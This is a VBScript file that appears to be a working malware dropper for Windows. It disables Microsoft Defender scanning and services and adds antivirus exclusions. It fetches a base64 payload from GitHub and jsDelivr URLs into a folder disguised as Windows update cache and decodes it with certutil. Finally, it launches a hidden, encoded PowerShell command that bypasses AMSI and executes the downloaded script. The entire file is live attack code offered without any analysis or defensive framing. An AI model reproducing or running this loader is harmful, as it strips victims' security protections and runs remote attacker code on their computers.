On Error Resume Next
Dim sh, fso, http, wd, b64, dat, cb, ps, stream, i, ok, urls
Set sh = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
wd = sh.ExpandEnvironmentStrings("%ProgramData%") & "\Microsoft\Windows\WER\Temp\.wucache"
If Not fso.FolderExists(wd) Then
  fso.CreateFolder sh.ExpandEnvironmentStrings("%ProgramData%") & "\Microsoft\Windows\WER\Temp"
  fso.CreateFolder wd
End If
b64 = wd & "\update.b64"
dat = "C:\Windows\Temp\pkg.dat"
cb = Replace(Replace(CStr(Now), " ", ""), ":", "")

sh.Run "powershell.exe -NoP -NonI -EP Bypass -C "Try{Set-MpPreference -DisableRealtimeMonitoring $true -EA 0;Set-MpPreference -DisableScriptScanning $true -EA 0;Add-MpPreference -ExclusionPath $env:ProgramData\Microsoft\Windows\WER\Temp\.wucache -EA 0;Add-MpPreference -ExclusionPath 'C:\Windows\Temp' -EA 0;Add-MpPreference -ExclusionProcess 'powershell.exe' -EA 0;Add-MpPreference -ExclusionProcess 'certutil.exe' -EA 0}Catch{}"" , 0, True
sh.Run "sc stop WinDefend", 0, True
sh.Run "sc stop WdNisSvc", 0, True

ok = False
urls = Array( _
  "https://raw.githubusercontent.com/xnobuddy/github-drop/main/updateA.b64?t=" & cb, _
  "https://cdn.jsdelivr.net/gh/xnobuddy/github-drop@main/updateA.b64?t=" & cb)

For i = 0 To UBound(urls)
  Set http = CreateObject("MSXML2.ServerXMLHTTP.6.0")
  http.Open "GET", urls(i), False
  http.setRequestHeader "User-Agent", "Mozilla/5.0"
  http.Send
  If http.Status = 200 Then
    If LenB(http.responseBody) > 1000 Then
      Set stream = CreateObject("ADODB.Stream")
      stream.Type = 1
      stream.Open
      stream.Write http.responseBody
      stream.SaveToFile b64, 2
      stream.Close
      ok = True
      Exit For
    End If
  End If
Next
If Not ok Then
  WScript.Echo "DL fail"
  WScript.Quit 1
End If

sh.Run "cmd /c certutil.exe -decode "" & b64 & "" "" & dat & "" >nul", 0, True
If Not fso.FileExists(dat) Then
  WScript.Echo "decode fail"
  WScript.Quit 2
End If

ps = "powershell.exe -NoP -NonI -EP Bypass -WindowStyle Hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoAJAB3AD0AJwBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABXAEUAUgBcAFQAZQBtAHAAXAAuAHcAdQBjAGEAYwBoAGUAJwAKACQAZQA9AEoAbwBpAG4ALQBQAGEAdABoACAAJAB3ACAAJwBiAG8AbwB0AC4AZQByAHIAJwAKAGYAdQBuAGMAdABpAG8AbgAgAEwAKAAkAG0AKQB7AHQAcgB5AHsAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJAB3ACkAKQB7AE4AZQB3AC0ASQB0AGUAbQAgACQAdwAgAC0ASQB0AGUAbQBUAHkAcABlACAARABpAHIAZQBjAHQAbwByAHkAIAAtAEYAbwByAGMAZQB8AE8AdQB0AC0ATgB1AGwAbAB9ADsAQQBkAGQALQBDAG8AbgB0AGUAbgB0ACAALQBMAGkAdABlAHIAYQBsAFAAYQB0AGgAIAAkAGUAIAAtAFYAYQBsAHUAZQAgACQAbQAgAC0ARQBBACAAMAB9AGMAYQB0AGMAaAB7AH0AfQAKAEwAIAAnAGwAZAByAF8AcwB0AGEAcgB0ACcACgB0AHIAeQB7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAHcAIAAtAEUAQQAgADAAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAJwBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcAAnACAALQBFAEEAIAAwADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAIAAtAEUAQQAgADAAOwBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAJwBtAHMAaQBlAHgAZQBjAC4AZQB4AGUAJwAgAC0ARQBBACAAMAA7AFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUAIAAtAEUAQQAgADAAOwBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBEAGkAcwBhAGIAbABlAEkATwBBAFYAUAByAG8AdABlAGMAdABpAG8AbgAgACQAdAByAHUAZQAgAC0ARQBBACAAMAA7AFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUwBjAHIAaQBwAHQAUwBjAGEAbgBuAGkAbgBnACAAJAB0AHIAdQBlACAALQBFAEEAIAAwAH0AYwBhAHQAYwBoAHsAfQAKAHQAcgB5AHsAJAB4AD0AWwBSAGUAZgBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACgAJwBTAHkAcwB0AGUAbQAuAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBBAHUAdABvAG0AYQB0AGkAbwBuAC4AewAwAH0AewAxAH0AJwAgAC0AZgAgACcAQQAnACwAJwBtAHMAaQBVAHQAaQBsAHMAJwApACkAOwBpAGYAKAAkAHgAKQB7ACQAZgA9ACQAeAAuAEcAZQB0AEYAaQBlAGwAZAAoACgAJwBhAG0AcwBpAEkAbgBpAHQAJwArACcARgBhAGkAbABlAGQAJwApACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQA7AGkAZgAoACQAZgApAHsAJABmAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAfQB9ACAAfQBjAGEAdABjAGgAewB9AAoATAAgACcAbABkAHIAXwBhAG0AcwBpACcACgAkAHAAPQAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAcABrAGcALgBkAGEAdAAnAAoAaQBmACgAIQAoAFQAZQBzAHQALQBQAGEAdABoACAAJABwACkAKQB7ACQAcAA9AEoAbwBpAG4ALQBQAGEAdABoACAAJAB3ACAAJwBwAGsAZwAuAGQAYQB0ACcAfQAKAGkAZgAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgACQAcAApACkAewBMACAAJwBsAGQAcgBfAG4AbwBwAGsAZwAnADsAZQB4AGkAdAAgADIAfQAKACQAYwA9AFsASQBPAC4ARgBpAGwAZQBdADoAOgBSAGUAYQBkAEEAbABsAFQAZQB4AHQAKAAkAHAAKQAKAEwAIAAoACcAbABkAHIAXwBjAGgAYQByAHMAPQAnACsAJABjAC4ATABlAG4AZwB0AGgAKQAKAHQAcgB5AHsAJgAoAFsAUwBjAHIAaQBwAHQAQgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJABjACkAKQA7AEwAIAAnAGwAZAByAF8AZABvAG4AZQAnAH0AYwBhAHQAYwBoAHsATAAgACgAJwBsAGQAcgBfAGUAcgByACAAJwArACQAXwAuAEUAeABjAGUAcAB0AGkAbwBuAC4ATQBlAHMAcwBhAGcAZQApADsAZQB4AGkAdAAgADQAfQA="
sh.Run ps, 0, True
WScript.Echo "U12 done - check .wucache\boot.err and .diag.log"
